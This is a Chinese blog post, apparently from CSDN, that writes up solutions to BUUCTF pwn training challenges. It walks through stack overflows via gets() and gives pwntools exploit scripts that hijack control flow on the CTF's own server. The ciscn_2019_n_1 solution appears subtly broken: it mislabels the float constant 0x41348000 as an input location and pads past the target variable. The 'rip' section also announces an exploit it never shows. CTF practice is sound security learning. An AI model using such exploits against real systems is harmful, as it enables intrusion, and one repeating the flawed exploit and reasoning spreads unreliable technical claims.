BUUCTF(PWN)

于 2024-09-27 09:06:16 发布
阅读量133 收藏 2
点赞数 6
分类专栏: CTF训练 文章标签: linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/fanshaoze/article/details/142550899
版权

test_your_nc 1

查看我们main函数,发现这里只有system函数和/bin/sh,不存在栈溢出,终端直接nc就行。

rip

查看main函数,我们发现gets没有限制输入,这里有栈溢出风险

查看fun我们发现了system函数和/bin/sh

exp:

warmup_csaw_2016

查看main函数,看到gets(V5)发现是栈溢出

我们找到了system函数,发现了cat flag.txt所以当成我们的返回函数

exp:

from pwn import *
context(os='linux',arch='amd64',log_level='debug')
io = remote('node5.buuoj.cn',26536)
#io = process('/home/xp/tm/bin/warmup_csaw_2016')
ret = 0x4004a1
dool = 0x400611
padding = b'a'*(0x40+0x8)
payload = padding + p64(dool)
io.sendline(payload)
io.interactive()

 ciscn_2019_n_1

查看main函数,发现这里有个func函数

进入func函数,我们看到有个变量,v1和v2,看第9行我们知道要输入的是V2要等于11.28125才能得到flag。第8行我们要先输入V1,我们要先看他们两个的距离是多少

这里是我们v1的距离是30

这里是v2的距离

两个距离我们用v1的0x30-0x4  v2的 得到我们的距离0x2c

所以我们要输入的距离就是0x2c

我们查看gets(v1)的输入位置是41348000 

exp:

from pwn import *
context(os='linux',arch='amd64',log_level='debug')
io = remote('node5.buuoj.cn','29213')
dool = 0x41348000
padding = b'a'*(0x2c+0x8)
payload = padding + p64(dool)
io.sendline(payload)
io.interactive()
樊少泽
关注
专栏目录
BUUCTF PWN rip1 WP
m0_54262894的博客
07-31 2574
BUUCTF PWN rip 1 这是一个WP,也是一个自己练习过程的记录。 先把文件放入pwn机中检查一下,发现并没有开启保护,所以应该是一道简单题 我们运行一下试试,它让你输入一段字符然后将字符输出。 把文件放在ida中查看一下 发现main函数并不复杂,只是定义了一个 s ,而且我们很容易就能找到栈溢出的点,我们都知道gets函数是一个危险函数,对于我们来说它可以接受到无限的字符,所以这里就是我们要pwn掉的点。 我们双击 s ,看它有多少空...
BUUCTF pwn rip
weixin_55190422的博客
11-03 338
现在开始是记录我个人对BUU上PWN题的刷题记录。 首先是一个ELF文件,放到Linux里面来看。 首先老套路checksec一下 接着我们将这个文件放到IDA中静态分析、 shift F12 一下看看敏感字段 我们发现里面有个系统调用函数。我们查看下汇编代码 我们查看Stack of main 视图发现只要存入15个字节就可以返回fun函数 所以payload: from pwn import * p = remote('node4.buuoj.cn',...
buuctf pwn解题
2301_80477504的博客
02-01 515
1.
BUUCTF pwn
L0g1c的博客
01-30 1666
第一道: 第一步:连接nc靶场 第二步:连接靶场后,执行 ls 命令,展示该靶场下目录文件。 第三步:里有个 flag文件 使用 cat命令进行查看。 得到flag
BUUCTF PWN-RIP详解
weixin_43780092的博客
09-07 5163
BUU CTF PWN 入门知识详解
BUUCTF PWN(2)
qq_60794823的博客
09-28 238
首先先用checksec查看开启了什么保护可以看到只开启了NX保护,即堆栈不可执行用32位的IDA打开附件,shift+f12查看字串打开main函数查看vuln函数,发现存在栈溢出漏洞的函数,**fgets(s, 32, edata)**这里对gets作出了限制,32(0x20)而s的大小0x3c>0x20所以不能造成溢出。这道题就不能解决了吗,结果肯定不是这样的仔细查看C代码可以发现,函数实现了字符串替换,将I替换为you,并将结果重组赋值给s。
BUUCTF Pwn pwn1_sctf_2016
MrTreebook的博客
12-05 1314
BUUCTF Pwn pwn1_sctf_20161.题目下载地址2.checksec检查保护3.IDA分析4.看一下栈大小5.找到后门函数地址6.exp 1.题目下载地址 点击下载题目 2.checksec检查保护 运行一下看看 3.IDA分析 看一下伪代码 int vuln() { const char *v0; // eax char s[32]; // [esp+1Ch] [ebp-3Ch] BYREF char v3[4]; // [esp+3Ch] [ebp-1Ch] BYREF
buuctf pwn入门1
weixin_63231007的博客
07-07 1370
buuctf pwn 前几道简单栈溢出&格式化字符串漏洞
BUUCTF pwn——pwn2_sctf_2016
CNS-Enterprise BCC-1701-J
04-18 354
BUUCTF 做题练习
BUUCTF PWN(1)
qq_60794823的博客
09-27 1039
首先checksec起手发现没有打开任何防护,是64位amd文件,使用IDA反汇编瞅一瞅首先shift+f12查看字串发现/bin/sh和system跟进查看/bin/sh的返回地址查看main函数的反编译代码发现**gets(s, argv)**栈溢出漏洞,没有限制s的输入大小点开s查看s的内存大小发现距离返回地址为0XF+0X8构造payload:‘a’ * 0x23 + p64(0x401186)发现连接超时。
BUUCTF PWN-堆题总结 2021-09-27
m0_56897090的博客
09-27 2083
文章目录整体分析-2021-09-27新角度TcacheUAFFile结构体HourseOfForceUnlink经验新角度ciscn_2019_final_5分析EXPTCACHEhitcon_2018_children_tcache分析EXPUAFwustctf2020_easyfast分析EXPACTF_2019_babyheap分析EXPgyctf_2020_some_thing_interesting分析EXPbjdctf_2020_YDSneedGrirlfrien分析EXPciscn_2019
BUUCTF pwn前四题解答和培训内容整理笔记
lzglove666的博客
01-31 1511
我们控制执行程序已有的代码的时候也可以控制程序执行好几段不相邻的程序已有的代码 (也就是 gadgets),这就是我们所要说的 ROP。这时,我们需要知道对应返回的代码的位置。ROP(Return Oriented Programming),即返回导向编程,通过栈溢出内容覆盖返回地址,使其跳转到可执行文件中已有的片段代码中执行我们选择的代码段。对x64的参数,大部分情况下,前六个参数储存在寄存器内,无法直接使用简单的栈溢出修改寄存器内容,这时候我们需要解除ROPgadget工具进行辅助。
[每日一PWN]BUUCTF PWN5
qq_55233040的博客
11-28 375
遇到了buu的pwn题中按顺序的第一道格式化字符串漏洞的题目,难度稍有提升。
Linux —— 网络基础(一)
学习C++的小陈同学
09-22 978
本篇只是简单的建立一个关于网络的基本概念和框架,有很多概念上不太完整,只是自己为了自己在初入学习网络时的简单粗俗理解,方便后续深入的学习网络相关的知识,如果有需要纠错的地方,可以评论一起讨论。
Linux实践】实验四:Shell实用功能及文件权限
Fulling的博客
09-25 595
实验内容 1、使用命令“cat /etc/named.conf”设置为别名named,然后再取消别名。 2、使用echo命令和输出重定向创建文本文件/root/nn,内容是hello,然后再使用追加重定向输入内容为word。 3、使用管道方式分页显示/etc/passwd的内容。 4、分别用文字设定法和数字设定法,对/root/ab文件设置权限,所有者为读取、写入和执行权限,同组用户为读取和写入权限,其他用户没有任何权限。 5、将文件/root/ab所有者更改为用户zhangsan。 6、将目录/root/
书生大模型实战(从入门到进阶)L0-Linux
m0_73672030的博客
09-22 998
本文是对书生大模型L0-Linux部分的学习和实现
[Linux] Linux进程PCB内部信息的深入理解
水墨不写bug
09-21 1171
[Linux] Linux进程PCB内部信息的深入理解: 一.查看进程 二.认识并了解进程的关键信息 I,PID/PPID II,exe III,cwd 三、fork()创建进程
Linux:共享内存】
2201_75755162的博客
09-19 654
共享内存不随着进程的结束就释放,因为共享内存不属于进程而属于操作系统,需要手动释放或者后续其它系统调用。共享内存的生命周期随内核。
Linux下Ssh互信过程记录
最新发布
冰之杍的博客
09-26 97
Linux下SSH互信过程记录
buuctf pwn
10-01
buuctf pwn是指一个CTF比赛中的pwn题目,其中包含了经典的栈溢出漏洞、ret2system和ret2text的漏洞利用方法。在栈溢出漏洞中,通过向缓冲区中输入超过其容量的数据,覆盖掉程序的返回地址,从而控制程序的执行流程。而ret2system是一种漏洞利用技术,通过修改返回地址为system函数的地址,来实现执行系统命令的目的。ret2text是一种类似的漏洞利用技术,通过修改返回地址为.text段中的某个特定地址,来实现执行指定代码的目的。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值